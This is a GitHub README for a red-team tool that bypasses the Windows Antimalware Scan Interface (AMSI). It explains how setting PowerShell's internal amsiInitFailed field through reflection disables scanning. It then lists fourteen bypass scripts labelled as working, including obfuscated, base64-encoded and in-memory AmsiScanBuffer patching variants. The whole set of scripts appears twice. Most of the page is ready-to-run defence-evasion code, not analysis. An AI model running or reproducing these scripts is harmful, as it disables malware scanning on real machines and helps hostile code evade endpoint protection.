AnandJogawade/RedTeam-PowerShell-AMSI-Bypass
GitHub: AnandJogawade/RedTeam-PowerShell-AMSI-Bypass
这是一个通过修改 PowerShell 内部字段来绕过 AMSI 检测的红队工具,用于解决安全测试中的脚本执行规避问题。
Stars: 1 | Forks: 0
# RedTeam-PowerShell-AMSI 绕过
# **什么是 AMSI**
Microsoft 反恶意软件扫描接口(AMSI)是微软推出的一项 Windows 安全接口,它允许应用程序和脚本引擎在执行前将内容提交给防病毒和端点安全产品进行检查。
PowerShell 集成了 AMSI,以便:
- 脚本
- 命令字符串
- 动态生成的代码
- 去混淆内容
可以在执行继续之前,由已安装的安全提供程序进行扫描。
当 PowerShell 运行可疑内容时,通常会:
- **将内容缓冲区发送到 AMSI**
- **AMSI 将其转发给 Microsoft Defender 或其他防病毒/EDR 软件**
- **安全提供程序分析内容**
- **返回检测判定**
- **PowerShell 允许或阻止执行**
PowerShell 内部的 AMSI 集成是通过 System.Management.Automation 程序集中的内部 .NET 类实现的。 ## **绕过原理** 1. **反射是一种 .NET 功能,允许代码**: - 检查程序集。 - 枚举类型。 - 访问方法和字段。 - 在运行时与内部成员交互。 2. **脚本访问一个内部 PowerShell 类**: - System.Management.Automation.AmsiUtils。 3. **在此类内部有一个通常称为以下名称的静态内部字段**: - amsiInitFailed。 此字段指示当前 PowerShell 进程内 AMSI 初始化是否失败。 4. **此脚本将其值设置为**: - $null,$true。使用 $null 是因为该字段是静态的,而不是将 $null 本身赋值给该字段。实际被赋值的字段值是 $true。
这导致当前 PowerShell 进程表现得如同 AMSI 初始化失败,从而有效地为该 PowerShell 会话禁用了 AMSI 扫描。 ## **使用方法** ### **首先运行状态检查命令,获取 AMSI、Defender、防火墙的当前状态/值** - 如果显示运行中,请运行 AMSI 绕过脚本,然后再次运行状态检查脚本。 **状态检查** ``` $s=Get-MpComputerStatus; $fw=Get-NetFirewallProfile; $t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $f=$t.GetField('amsiInitFailed','NonPublic,Static'); $a=$f.GetValue($null); $sb=(Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -ErrorAction Ignore).EnableScriptBlockLogging; $tm=(Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction Ignore).EnableTranscripting; [pscustomobject]@{"Real-Time Protection"=if($s.RealTimeProtectionEnabled){"TRUE & Running"}else{"Turned Off"};"IOAV Protection"=if($s.IoavProtectionEnabled){"TRUE & Running"}else{"Turned Off"};"Behavior Monitoring"=if($s.BehaviorMonitorEnabled){"TRUE & Running"}else{"Turned Off"};"Antispyware"=if($s.AntispywareEnabled){"TRUE & Running"}else{"Turned Off"};"Anti-Malware Service"=if($s.AMServiceEnabled){"TRUE & Running"}else{"Turned Off"};"Firewall Domain"=if(($fw|? Name -eq 'Domain').Enabled){"TRUE & Running"}else{"Turned Off"};"Firewall Private"=if(($fw|? Name -eq 'Private').Enabled){"TRUE & Running"}else{"Turned Off"};"Firewall Public"=if(($fw|? Name -eq 'Public').Enabled){"TRUE & Running"}else{"Turned Off"};"AMSI Status"=if(-not $a){"AMSI is Running"}else{"AMSI NOT Running / Bypassed"};"Script Block Logging"=if($sb){"Enabled"}else{"Not Configured"};"Transcription Logging"=if($tm){"Enabled"}else{"Not Configured"};"Language Mode"=$ExecutionContext.SessionState.LanguageMode} | Format-List ```
### **1. AMSI 绕过脚本 [逐行粘贴,每行单独粘贴] (有效)** ``` $v1=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if($v1){$v2=$v1.GetField('amsiInitFailed','NonPublic,Static'); if($v2){"AMSI Bypass Patch Applied Successfully!"}else{"Field not found"}}else{"Type not resolved"}; $v2.SetValue($null,$true) ``` ### **2. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if(-not $amsi){Write-Error "Type not resolved"; return}; $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); if(-not $field){Write-Error "Field not found"; return}; $field.SetValue($null,$true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **3. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if (-not $amsi) { Write-Error "Type not resolved"; return }; $field = $amsi.GetField('amsiInitFailed','NonPublic,Static'); if (-not $field) { Write-Error "Field not found"; return }; $field.SetValue($null, $true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **4. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $A1=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if(-not $A1){Write-Error "Type not resolved"; return}; $A2= $A1.GetField('amsiInitFailed','NonPublic,Static'); if(-not $A2){Write-Error "Field not found"; return}; $A2.SetValue($null,$true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **5. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c $d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **6. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` ${byP`Ass} = (-join ([regex]::Matches(("{7}{11}{10}{14}{5}{9}{13}{6}{15}{2}{0}{4}{1}{16}{12}{8}{3}" -f'e2',("{0}{1}"-f '41','6d'),'6',("{2}{0}{1}" -f'9',("{1}{0}"-f '73','6c'),('7'+'46')),'e',('61'+'6'),'6',("{1}{0}{3}{2}"-f'37','5','6',("{1}{2}{0}" -f'65',('97'+'3'),'74')),('95'+'5'),("{3}{2}{0}{1}"-f '6',("{1}{0}"-f('74'+'2'),'e'),'5',("{0}{1}" -f '76',("{0}{1}"-f'5',('6d'+'6')))),'e4','d2','36',("{3}{0}{1}{2}" -f ('41'+'7'),("{1}{0}"-f '46','57'),('f6'+'d'),'e'),("{1}{0}"-f '6e',('d6'+'1')),("{2}{1}{0}" -f("{0}{1}" -f("{0}{1}" -f('46'+'9'),'6'),'f'),'7','1'),'7'), '..') | ForEach-Object { [char]([convert]::ToUInt32(${_}.Value, 16)) })) ${am`si} = [Text.Encoding]::UTF8.GetString((0x61,0x6d,0x73,0x69,0x49,0x6e,0x69,0x74,0x46,0x61,0x69,0x6c,0x65,0x64)) ${aS`sEm`BLY} = [Ref].Assembly ${Ty`PE} = ${ASsemB`LY}.GetType(${ByP`A`Ss}) ${fIE`ld} = ${t`Ype}.GetField(${A`msi}, ("{3}{2}{4}{0}{1}" -f("{1}{0}" -f 'ti',('S'+'ta')),'c',('on'+'P'),'N',("{1}{0}" -f("{1}{0}"-f', ',("{0}{1}"-f('b'+'li'),'c')),'u'))) ${F`IELd}.SetValue(${N`UlL}, ${TR`Ue}) ``` ### **7. AMSI 绕过脚本 [单行命令] (有效)** ``` $c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c; $d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **8. AMSI 绕过脚本 [单行命令] (有效)** ``` [System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation').GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### **9. AMSI 绕过脚本 [单行命令] (有效)** ``` $t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if($t){$f=$t.GetField('amsiInitFailed','NonPublic,Static'); $target=$null; $value=$true; if($f){"AMSI Bypass Patch Applied Successfully!"; $f.SetValue($target,$value)} else {"Field missing"}} else {"Type missing"} ``` ### **10. AMSI 绕过脚本 [混淆的单行命令(最可靠)] (适用于旧版 Windows)** ``` S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` ### **11. AMSI 绕过脚本 [适用于受限环境的 Base64 编码单行命令] (适用于旧版 Windows)** ``` [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) ``` ### **12. AMSI 绕过脚本 [PowerShell 6+ 单行命令] (适用于旧版 Windows)** ``` [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### **13. AMSI 绕过脚本 [混淆的单行命令] (适用于旧版 Windows)** ``` S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ); Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **14. AMSI 绕过脚本 [将此脚本复制并保存为 .ps1 文件,然后在 PowerShell 中运行] (适用于旧版 Windows)** ``` $A=[Ref].Assembly.GetType((([char]65)+([char]109)+([char]115)+([char]105)+([char]85)+([char]116)+([char]105)+([char]108)+([char]115)) ) $F=$A.GetField((([char]65)+([char]109)+([char]115)+([char]105)+([char]73)+([char]110)+([char]105)+([char]116)+([char]70)+([char]97)+([char]105)+([char]108)+([char]101)+([char]100)),'NonPublic,Static') $F.SetValue($null,$true) $Win=[Ref].Assembly.GetType('System.Management.Automation.Utils') $PtrType = [System.IntPtr] $Win=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $AmsiDLL = [System.Runtime.InteropServices.Marshal]::GetHINSTANCE($Win.Module) $GetProcAddress = (Add-Type -MemberDefinition ' [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);' -Name "Win32" -Namespace Win32Functions -PassThru) $AmsiScanBufferPtr = $GetProcAddress::GetProcAddress($AmsiDLL,"AmsiScanBuffer") $Patch = [byte[]]@(0xB8,0x57,0x00,0x07,0x80,0xC3) # Mov eax,0x80070057; ret $UnsafeNativeMethods = @" using System; using System.Runtime.InteropServices; public class UnsafeNativeMethods { [DllImport("kernel32.dll", SetLastError = true)] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } "@ Add-Type $UnsafeNativeMethods $oldProtect = 0 [UnsafeNativeMethods]::VirtualProtect($AmsiScanBufferPtr, [uint32]6, 0x40, [ref]$oldProtect) | Out-Null [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $AmsiScanBufferPtr, $Patch.Length) [UnsafeNativeMethods]::VirtualProtect($AmsiScanBufferPtr, [uint32]6, $oldProtect, [ref]$oldProtect) | Out-Null Write-Output "AMSI Bypass Patch Applied Successfully!" ```
### **概念验证** 
PowerShell 内部的 AMSI 集成是通过 System.Management.Automation 程序集中的内部 .NET 类实现的。 ## **绕过原理** 1. **反射是一种 .NET 功能,允许代码**: - 检查程序集。 - 枚举类型。 - 访问方法和字段。 - 在运行时与内部成员交互。 2. **脚本访问一个内部 PowerShell 类**: - System.Management.Automation.AmsiUtils。 3. **在此类内部有一个通常称为以下名称的静态内部字段**: - amsiInitFailed。 此字段指示当前 PowerShell 进程内 AMSI 初始化是否失败。 4. **此脚本将其值设置为**: - $null,$true。使用 $null 是因为该字段是静态的,而不是将 $null 本身赋值给该字段。实际被赋值的字段值是 $true。
这导致当前 PowerShell 进程表现得如同 AMSI 初始化失败,从而有效地为该 PowerShell 会话禁用了 AMSI 扫描。 ## **使用方法** ### **首先运行状态检查命令,获取 AMSI、Defender、防火墙的当前状态/值** - 如果显示运行中,请运行 AMSI 绕过脚本,然后再次运行状态检查脚本。 **状态检查** ``` $s=Get-MpComputerStatus; $fw=Get-NetFirewallProfile; $t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $f=$t.GetField('amsiInitFailed','NonPublic,Static'); $a=$f.GetValue($null); $sb=(Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -ErrorAction Ignore).EnableScriptBlockLogging; $tm=(Get-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -ErrorAction Ignore).EnableTranscripting; [pscustomobject]@{"Real-Time Protection"=if($s.RealTimeProtectionEnabled){"TRUE & Running"}else{"Turned Off"};"IOAV Protection"=if($s.IoavProtectionEnabled){"TRUE & Running"}else{"Turned Off"};"Behavior Monitoring"=if($s.BehaviorMonitorEnabled){"TRUE & Running"}else{"Turned Off"};"Antispyware"=if($s.AntispywareEnabled){"TRUE & Running"}else{"Turned Off"};"Anti-Malware Service"=if($s.AMServiceEnabled){"TRUE & Running"}else{"Turned Off"};"Firewall Domain"=if(($fw|? Name -eq 'Domain').Enabled){"TRUE & Running"}else{"Turned Off"};"Firewall Private"=if(($fw|? Name -eq 'Private').Enabled){"TRUE & Running"}else{"Turned Off"};"Firewall Public"=if(($fw|? Name -eq 'Public').Enabled){"TRUE & Running"}else{"Turned Off"};"AMSI Status"=if(-not $a){"AMSI is Running"}else{"AMSI NOT Running / Bypassed"};"Script Block Logging"=if($sb){"Enabled"}else{"Not Configured"};"Transcription Logging"=if($tm){"Enabled"}else{"Not Configured"};"Language Mode"=$ExecutionContext.SessionState.LanguageMode} | Format-List ```
### **1. AMSI 绕过脚本 [逐行粘贴,每行单独粘贴] (有效)** ``` $v1=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if($v1){$v2=$v1.GetField('amsiInitFailed','NonPublic,Static'); if($v2){"AMSI Bypass Patch Applied Successfully!"}else{"Field not found"}}else{"Type not resolved"}; $v2.SetValue($null,$true) ``` ### **2. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if(-not $amsi){Write-Error "Type not resolved"; return}; $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); if(-not $field){Write-Error "Field not found"; return}; $field.SetValue($null,$true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **3. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $amsi = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if (-not $amsi) { Write-Error "Type not resolved"; return }; $field = $amsi.GetField('amsiInitFailed','NonPublic,Static'); if (-not $field) { Write-Error "Field not found"; return }; $field.SetValue($null, $true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **4. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $A1=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if(-not $A1){Write-Error "Type not resolved"; return}; $A2= $A1.GetField('amsiInitFailed','NonPublic,Static'); if(-not $A2){Write-Error "Field not found"; return}; $A2.SetValue($null,$true);Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **5. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` $c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c $d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **6. AMSI 绕过脚本 [每行粘贴到新行] (有效)** ``` ${byP`Ass} = (-join ([regex]::Matches(("{7}{11}{10}{14}{5}{9}{13}{6}{15}{2}{0}{4}{1}{16}{12}{8}{3}" -f'e2',("{0}{1}"-f '41','6d'),'6',("{2}{0}{1}" -f'9',("{1}{0}"-f '73','6c'),('7'+'46')),'e',('61'+'6'),'6',("{1}{0}{3}{2}"-f'37','5','6',("{1}{2}{0}" -f'65',('97'+'3'),'74')),('95'+'5'),("{3}{2}{0}{1}"-f '6',("{1}{0}"-f('74'+'2'),'e'),'5',("{0}{1}" -f '76',("{0}{1}"-f'5',('6d'+'6')))),'e4','d2','36',("{3}{0}{1}{2}" -f ('41'+'7'),("{1}{0}"-f '46','57'),('f6'+'d'),'e'),("{1}{0}"-f '6e',('d6'+'1')),("{2}{1}{0}" -f("{0}{1}" -f("{0}{1}" -f('46'+'9'),'6'),'f'),'7','1'),'7'), '..') | ForEach-Object { [char]([convert]::ToUInt32(${_}.Value, 16)) })) ${am`si} = [Text.Encoding]::UTF8.GetString((0x61,0x6d,0x73,0x69,0x49,0x6e,0x69,0x74,0x46,0x61,0x69,0x6c,0x65,0x64)) ${aS`sEm`BLY} = [Ref].Assembly ${Ty`PE} = ${ASsemB`LY}.GetType(${ByP`A`Ss}) ${fIE`ld} = ${t`Ype}.GetField(${A`msi}, ("{3}{2}{4}{0}{1}" -f("{1}{0}" -f 'ti',('S'+'ta')),'c',('on'+'P'),'N',("{1}{0}" -f("{1}{0}"-f', ',("{0}{1}"-f('b'+'li'),'c')),'u'))) ${F`IELd}.SetValue(${N`UlL}, ${TR`Ue}) ``` ### **7. AMSI 绕过脚本 [单行命令] (有效)** ``` $c = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGEgPSBbUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtc2lVdGlscycpOyAkYiA9ICRhLkdldEZpZWxkKCdhbXNpSW5pdEZhaWxlZCcsJ05vblB1YmxpYyxTdGF0aWMnKTs=')); iex $c; $d = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGIuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==')); iex $d; Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **8. AMSI 绕过脚本 [单行命令] (有效)** ``` [System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation').GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### **9. AMSI 绕过脚本 [单行命令] (有效)** ``` $t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); if($t){$f=$t.GetField('amsiInitFailed','NonPublic,Static'); $target=$null; $value=$true; if($f){"AMSI Bypass Patch Applied Successfully!"; $f.SetValue($target,$value)} else {"Field missing"}} else {"Type missing"} ``` ### **10. AMSI 绕过脚本 [混淆的单行命令(最可靠)] (适用于旧版 Windows)** ``` S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) ``` ### **11. AMSI 绕过脚本 [适用于受限环境的 Base64 编码单行命令] (适用于旧版 Windows)** ``` [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) ``` ### **12. AMSI 绕过脚本 [PowerShell 6+ 单行命令] (适用于旧版 Windows)** ``` [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('s_amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ### **13. AMSI 绕过脚本 [混淆的单行命令] (适用于旧版 Windows)** ``` S`eT-It`em ( 'V'+'aR' + 'IA' + (("{1}{0}"-f'1','blE:')+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a')) ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ); Write-Output "AMSI Bypass Patch Applied Successfully!" ``` ### **14. AMSI 绕过脚本 [将此脚本复制并保存为 .ps1 文件,然后在 PowerShell 中运行] (适用于旧版 Windows)** ``` $A=[Ref].Assembly.GetType((([char]65)+([char]109)+([char]115)+([char]105)+([char]85)+([char]116)+([char]105)+([char]108)+([char]115)) ) $F=$A.GetField((([char]65)+([char]109)+([char]115)+([char]105)+([char]73)+([char]110)+([char]105)+([char]116)+([char]70)+([char]97)+([char]105)+([char]108)+([char]101)+([char]100)),'NonPublic,Static') $F.SetValue($null,$true) $Win=[Ref].Assembly.GetType('System.Management.Automation.Utils') $PtrType = [System.IntPtr] $Win=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') $AmsiDLL = [System.Runtime.InteropServices.Marshal]::GetHINSTANCE($Win.Module) $GetProcAddress = (Add-Type -MemberDefinition ' [DllImport("kernel32.dll", SetLastError=true)] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);' -Name "Win32" -Namespace Win32Functions -PassThru) $AmsiScanBufferPtr = $GetProcAddress::GetProcAddress($AmsiDLL,"AmsiScanBuffer") $Patch = [byte[]]@(0xB8,0x57,0x00,0x07,0x80,0xC3) # Mov eax,0x80070057; ret $UnsafeNativeMethods = @" using System; using System.Runtime.InteropServices; public class UnsafeNativeMethods { [DllImport("kernel32.dll", SetLastError = true)] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } "@ Add-Type $UnsafeNativeMethods $oldProtect = 0 [UnsafeNativeMethods]::VirtualProtect($AmsiScanBufferPtr, [uint32]6, 0x40, [ref]$oldProtect) | Out-Null [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $AmsiScanBufferPtr, $Patch.Length) [UnsafeNativeMethods]::VirtualProtect($AmsiScanBufferPtr, [uint32]6, $oldProtect, [ref]$oldProtect) | Out-Null Write-Output "AMSI Bypass Patch Applied Successfully!" ```
### **概念验证** 
标签:AI合规, AMSI绕过, Conpot, EDR绕过, .NET反射, PowerShell脚本, Windows安全, 动态代码执行, 多人体追踪, 威胁检测, 安全接口绕过, 恶意软件规避, 攻击技术, 系统管理自动化, 网络安全, 脚本执行绕过, 防病毒规避, 隐私保护, 高交互蜜罐